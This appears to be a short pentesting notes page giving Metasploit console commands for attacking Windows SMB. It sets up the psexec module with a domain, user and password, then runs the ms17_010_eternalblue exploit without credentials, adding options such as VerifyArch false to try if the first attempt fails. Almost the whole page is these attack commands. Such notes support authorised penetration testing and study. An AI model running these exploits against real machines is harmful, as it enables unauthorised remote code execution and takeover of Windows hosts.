Skip to main content

exploiting_windows_and_samba_vulnerabilities

If we have some unprivileged credentials for a windows machine we can attempt a psexec exploit:

search type:exploit psexec
use exploit/windows/smb/psexec
set SMBDomain <NAMEOFTHEDOMAIN>
set SMBPass <apassword>
set SMBUser <user>
run

We can altro try to exploit without credentials using eternalblue:

search type:exploit eternal
use exploit/windows/smb/ms17_010_eternalblue
set MaxExploitAttempts 9
run

And if it doesn't work we can try with other advanced options such as:

set target 0
set VerifyArch false
run